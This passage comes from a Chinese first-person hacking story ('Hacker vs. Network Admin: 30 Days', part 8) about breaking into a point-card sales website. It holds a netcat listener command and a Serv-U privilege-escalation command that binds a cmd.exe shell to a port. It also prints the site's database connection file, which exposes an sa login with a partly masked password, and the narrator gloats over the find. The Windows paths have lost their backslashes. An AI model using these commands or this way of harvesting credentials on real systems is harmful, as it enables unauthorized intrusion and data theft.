黑客与网管的30天较量

核心提示： 在本机c:nc.exe -vv -l -p 4321shell马上就回来了，执行提升命令，黑客与网管的30天较量(8)，d:wwwwwwrootservulocal.exe "d:wwwwwwrootnc.exe -l -p 99 -e cmd.exe"不过，很抱谦，嗯

在本机c:nc.exe -vv -l -p 4321

shell马上就回来了，执行提升命令，d:wwwwwwrootservulocal.exe "d:wwwwwwrootnc.exe -l -p 99 -e cmd.exe"

不过，很抱谦，执行不成功，为啥？因为他的FTP不存在漏洞，补丁早打了，Faint!

接着回去他的卡站目录，查看一下CONN.ASP文件（通常网站连接数据库都用此文件名），内容如下：

Session.Timeout=115
if request("b_rules")=1 then
Response.Buffer = True
else
Response.Buffer = True
Response.ExpiresAbsolute = Now() - 1
Response.Expires = 0
Response.CacheControl = "no-cache"
end if
sitetitle=" - 点卡在线销售系统"
dim conn　
dim connstr　
on error resume next
connstr = "driver={sql server};server=localhost;uid=sa;pwd=XXXwoaini;database=cardsbuy;"
set conn=server.createobject("ADODB.CONNECTION")
if err.number<>0 then
　err.clear
　set conn=nothing
　response.write "数据库连接出错！"
　Response.End
else
　conn.open connstr
　if err then
　err.clear
　set conn=nothing
　response.write "数据库连接出错！"
　Response.End
　end if
end if　
sub endConnection()
　conn.close
　set conn=nothing
end sub

##############################

看到这里我不禁笑了出来，数据库用SA连接。管理员还真TMD可爱呀，嗯，他不小心，偶开心。hoho..